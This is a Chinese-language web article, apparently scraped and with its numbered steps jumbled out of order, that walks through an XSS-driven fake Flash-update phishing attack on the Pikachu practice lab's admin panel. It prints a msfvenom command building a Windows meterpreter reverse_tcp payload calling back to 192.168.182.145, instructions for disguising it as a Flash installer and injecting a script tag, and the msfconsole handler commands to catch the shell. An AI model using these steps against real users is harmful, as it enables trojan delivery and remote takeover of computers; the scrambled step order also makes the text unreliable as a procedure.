欢迎访问!

Office学习网

您现在的位置是:主页 > 网络技术

网络技术

flash攻击钓到 wins电脑权限

发布时间:2026-08-19网络技术评论
文章浏览阅读686次,点赞16次,收藏3次。xss-flash漏洞攻击 获取操作权限 kali的 msfvenom 生成’病毒‘ _要害攻击flash传载

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.182.145  LPORT3366 -f exe shell.exe 5.6  病毒修改为  真正的exe的文件名称,  2.  复制js代码 并保存在apache的网站根目录下保存为js文件, 输入shell命令即可执行命令, 5.8  可以看到下载下来的是我们伪装成执行程序的病毒,。

如果通过ip访问可跳转到假网站点击下载效果相同, 5.5 打开kali制作病毒, 6.  在kali先进行监听操作 msfconsole  //依次执行代码 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.182.145          //注意和生成病毒时一致 set lport 3366 run 7. 当受害者双击运行可执行程序时kali攻击者可监测到,   , 5.4 在1.js文件中 将受害者点击下载的文件名改为真的flash执行文件的名称, 1. 打开XSS网站https://xssaq.com 注册登录,当管理员认为需要升级时点击“立即升级”, 5. 当管理员点击“立即升级”下载“病毒”flash可执行文件,点击“保存”,点击公共模块选择FLASH弹窗钓鱼。

8.输入命令mstsc      被控制目标执行相同命令 通关xss-flash钓鱼获取目标的操作权限基本演示结束。

因为该网站页面与病毒执行文件在网站根目录的同一级内, 5.2  修改文件后 在数据库的xssblind表中删除所有记录并将js文件再次通过xss漏洞发送给后台, script src/script 5.3 搭建一个假的flash网页 将下载的包解压放在网站根目录下,5.1   为了更加真实 将1.js文件内容可执行exe文件地址和名称改为ip/flash.exe, 5.7  刷新admin页面 弹出钓鱼弹窗, 3. 以pikachu后台管理员作为攻击对象 从xss漏洞关卡输入代码引用外部的js文件 攻击者输入代码script src/script 4.  刷新后台管理界面显示钓鱼信息。

广告位

热心评论

评论列表